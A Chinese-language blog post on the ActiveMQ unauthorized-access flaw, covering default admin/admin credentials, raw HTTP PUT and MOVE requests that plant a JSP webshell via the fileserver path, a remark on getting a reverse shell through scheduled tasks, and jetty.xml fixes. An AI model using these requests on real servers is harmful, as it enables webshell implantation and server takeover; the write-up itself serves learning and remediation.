ActiveMQ未授权访问漏洞

2020/08/17 15:03 · 未授权访问 ·  原创文章 · 338阅读 · 0评论

服务简介

ActiveMQ是Apache下的开源项目,是一种在分布式系统中应用程序借以传递消息的媒介,ActiveMQ默认监听在8161端口。

产生原因

未设置密码或使用默认密码。

漏洞利用

ActiveMQ默认账号密码为admin/admin,

若服务器存在fileserver目录,则可以通过put请求写入文件,但fileserver下的文件默认不解析

#Request

PUT /fileserver/shell.jsp HTTP/1.1
Host: 192.168.83.99:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.83.99:8161/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1qt95l6g0lzyg1vt89fbhhzowh
Connection: close
Content-Length: 6

test

#Resopnse

HTTP/1.1 204 No Content
Connection: close
Server: Jetty(8.1.16.v20140903)

然后使用MOVE请求移动文件,如果是写入webshell需要做的物理路径,在http://192.168.83.99:8161/admin/test/systemProperties.jsp可以查看物理路径

#Request
MOVE /fileserver/shell.jsp HTTP/1.1
Destination:file:/opt/activemq/webapps/api/s.jsp
Host: 192.168.197.25:8161
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 21

Content-Length: 0

#Response
HTTP/1.1 204 No Content
Server: Jetty(8.1.16.v20140903)

然后访问 http://192.168.83.99:8161/api/s.jsp 即可,

如果权限足够,可以利用计划任务反弹shell

修复方法

1)针对未授权访问,可修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true,重启服务即可

2)针对弱口令,可修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码,重启服务即可

您可能感兴趣的文章

本文地址:https://www.ouyangxiaoze.com/2020/08/631.html
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!

文件下载

boke112导航_独立博客导航平台

上一篇:
下一篇:

 发表评论


表情